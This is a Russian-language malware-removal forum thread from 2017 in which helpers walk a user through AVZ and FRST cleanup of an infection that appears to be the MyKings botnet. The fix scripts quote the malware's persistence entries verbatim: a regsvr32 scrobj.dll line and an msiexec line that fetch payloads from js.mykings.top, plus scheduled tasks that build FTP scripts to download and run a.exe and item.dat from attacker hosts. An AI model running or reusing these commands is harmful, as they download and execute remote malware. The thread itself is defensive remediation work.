Критическая неполадка и появление нового пользователя при перезагрузке (ASP.User)

**kuskus** · 22.05.2017, 11:56

Сегодня антивирус поместил в карантин URL:Mal и WannaCry-C [Trj]. Затем появилось окно с предупреждением о перезагрузке системы в связи с критической неполадкой, а непосредственно при перезагрузке появился запрос на выбор пользователя между user и ASP.user, хотя раньше при включении и перезагрузке выбор пользователя отсутствовал. При работе сборщика логов AVZ открывался браузер IE, которым я не пользуюсь, - на диске C появилось приложение prohi.exe, которое антивирус опознал как Malware-gen.
В браузере GChrome окно с надписью - Некоторые настройки Chrome недавно были изменены посторонней программой.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 22.05.2017, 12:00

Уважаемый(ая) kuskus, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**Vvvyg** · 22.05.2017, 21:44

Выполните скрипт в AVZ:

Код:

begin
 SearchRootkit(true, true);
 SetAVZGuardStatus(True);
 ClearQuarantine;
 QuarantineFileF('c:\windows\winlog', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
 QuarantineFile('C:\Windows\Winlog\xinstaller.exe', '');
 QuarantineFile('C:\Users\user\AppData\Local\Microsoft\Macromed\Flash Player\Updater Startup Utility\B7B3597B-D1B3-454E-B478-933189D9F9AC.exe', '');
 DeleteFile('C:\Windows\Winlog\xinstaller.exe', '32');
 DeleteFile('C:\Users\user\AppData\Local\Microsoft\Macromed\Flash Player\Updater Startup Utility\B7B3597B-D1B3-454E-B478-933189D9F9AC.exe', '32');
 DeleteService('WITS');
 DeleteFileMask('c:\windows\winlog', '*', true);
 DeleteFileMask('c:\users\user\appdata\local\microsoft\macromed\flash player\updater startup utility', '*', true);
 DeleteDirectory('c:\windows\winlog');
 DeleteDirectory('c:\users\user\appdata\local\microsoft\macromed\flash player\updater startup utility');
 ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\A9AF247A8-DA69-4617-B2A3-72485B093CC1" /F', 0, 15000, true);
BC_ImportALL;
ExecuteSysClean;
 BC_DeleteSvc('WITS');
BC_Activate;
RebootWindows(true);
end.

Компьютер перезагрузится.

Выполните в AVZ скрипт:

Код:

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

O4 - HKCU\..\Run: [E72B1338A84FAC5B92E5F250E30E2E866E45CA98._service_run] C:\Program Files\Google\Chrome\Application\chrome.exe --type=service /prefetch:8
O20 - AppInit_DLLs:  C:\Windows\system32\guard32.dll

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (можно все в одном архиве).

**kuskus** · 23.05.2017, 09:56

Добрый день. Все сделала.

**Vvvyg** · 23.05.2017, 21:22

Запустите FRST/FRST64. Нажмите комбинацию Ctrl+Y - откроется Блокнот. Скопируйте в него следующий код:

Код:

CreateRestorePoint:
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q
S3 ISODrive; \??\I:\UltraISO Premium Edition 9.5.3.2901\drivers\ISODrive.sys [X]
017-05-22 19:58 - 2017-05-22 19:58 - 03723264 ____N C:\Windows\trzBF2A.tmp
2017-05-22 18:37 - 2017-05-22 18:37 - 03723264 ____N C:\Windows\trzAC64.tmp
2017-05-22 16:12 - 2017-05-22 16:32 - 00000000 ____D C:\Users\user\AppData\Local\IIIQF
2016-07-30 20:33 - 2016-07-30 20:33 - 4423896 ____N () C:\Users\user\AppData\Local\Temp\7T9gvP5EmKdu.exe
2016-03-15 13:12 - 2016-03-15 13:12 - 2951520 _____ (Microsoft Corporation) C:\Users\user\AppData\Local\Temp\Setup-punto.exe
2016-03-08 11:59 - 2012-09-27 04:28 - 0608160 ____R (HP) C:\Users\user\AppData\Local\Temp\siinst.exe
2016-03-08 12:11 - 2012-09-27 04:29 - 0243616 _____ (HP) C:\Users\user\AppData\Local\Temp\siuninst.exe
2016-03-06 13:51 - 2016-03-06 13:52 - 47347840 _____ (Skype Technologies S.A.) C:\Users\user\AppData\Local\Temp\SkypeSetup.exe
2016-03-08 11:59 - 2012-09-26 09:57 - 0270336 ____R (HP) C:\Users\user\AppData\Local\Temp\strings.dll
2016-03-18 10:21 - 2014-10-20 13:00 - 0485184 _____ (Yandex LLC) C:\Users\user\AppData\Local\Temp\yupdate-exec-punto.exe
Task: {055602A8-C3D4-4D8A-AC5D-E329DBBD9773} - System32\Tasks\Mysa1 => Rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
Task: {E411C2E1-6371-458A-87C0-8A0F8B62EC4A} - System32\Tasks\Mysa => cmd /c echo open down.mysking.info&gt;s&amp;echo test&gt;&gt;s&amp;echo 1433&gt;&gt;s&amp;echo binary&gt;&gt;s&amp;echo get a.exe&gt;&gt;s&amp;echo bye&gt;&gt;s&amp;ftp -s:s&amp;a.exe
AlternateDataStreams: C:\ProgramData\TEMP:41ADDB8A [149]
AlternateDataStreams: C:\Users\user\Downloads\2bd41609-6d14-75d8-8a05-e6e249918ef6.jpg:$CmdZnID [26]
AlternateDataStreams: C:\Users\user\Downloads\3a3be510ee89205b05a99b63e82a60ec.jpg:$CmdZnID [26]
AlternateDataStreams: C:\Users\user\Downloads\3dd5a2a5909963de846ad201d856b6e4.jpg:$CmdZnID [26]
AlternateDataStreams: C:\Users\user\Downloads\424029ff8c4944f6370a947b4b210c63.jpg:$CmdZnID [26]
AlternateDataStreams: C:\Users\user\Downloads\46920b245a74aac958b47c4a3c828bd4.jpg:$CmdZnID [26]
AlternateDataStreams: C:\Users\user\Downloads\D42A004_1_1.jpg:$CmdZnID [26]
AlternateDataStreams: C:\Users\user\Downloads\d74ff7ba1ddf65ecbdabcf027d804446.jpg:$CmdZnID [26]
AlternateDataStreams: C:\Users\user\Downloads\img_13511.jpg:$CmdZnID [26]
AlternateDataStreams: C:\Users\user\Downloads\АРКАДИЙ ШИЛКЛОПЕР – Song Of Every One AKA 'ДУДКИ' (L.Shankar).mp3:$CmdZnID [26]
AlternateDataStreams: C:\Users\user\Documents\ФАВОР_АЛИНА.docx:$CmdZnID [26]
Reboot:

Сохраните (Ctrl+S) и закройте.
Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

С этой темой ознакомьтесь, примените рекомендации, сообщите ситуацию.

**regist** · 14.06.2017, 09:14

+ Скачайте свежую версию FRST и сделайте свежие логи.

**kuskus** · 14.06.2017, 16:09

Сообщение о критической неполадке больше не всплывает.

**regist** · 14.06.2017, 21:07

1) promkod.ru/today - этот сайт вам знаком?

2) Эти расширения сами ставили?

Код:

CHR Extension: (Yulia Brodskaya) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlgdloilieclkegafohackmhffbmdpko [2017-05-22]
CHR Extension: (Элементы Яндекса: Почта) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\lonndeeklpobbkjaacljjjkddafbbbfa [2017-05-22]
CHR Extension: (LetyShops) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\lphicbbhfmllgmomkkhjfkpbdlncafbn [2017-06-09]

3)

Отключите до перезагрузки антивирус.

Выделите следующий код:

Код:

Start::
CreateRestorePoint:
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
GroupPolicy: Restriction ? <======= ATTENTION
GroupPolicy\User: Restriction ? <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{3ee8e3db-5da8-45d4-a6db-4aff26526d27} <======= ATTENTION (Restriction - IP)
2017-05-23 10:18 - 2017-06-13 15:49 - 00000060 _____ C:\Windows\system32\s
2017-05-23 09:08 - 2017-05-23 09:08 - 00000005 _____ C:\Windows\system32\1.txt
Task: {E411C2E1-6371-458A-87C0-8A0F8B62EC4A} - System32\Tasks\Mysa => cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe <==== ATTENTION
Task: {FE21B457-6A2E-4673-8DC2-62B552A850E7} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <===== ATTENTION
EmptyTemp:
Reboot:
End::

Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

**regist** · 17.06.2017, 13:29

Сообщение от regist

Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Где лог? Или вам нравится ходить недолеченным?

**CyberHelper** · 17.06.2017, 13:39

Статистика проведенного лечения:

Получено карантинов: 1
Обработано файлов: 5
В ходе лечения вредоносные программы в карантинах не обнаружены

Критическая неполадка и появление нового пользователя при перезагрузке (ASP.User) (заявка № 212339)

Опции темы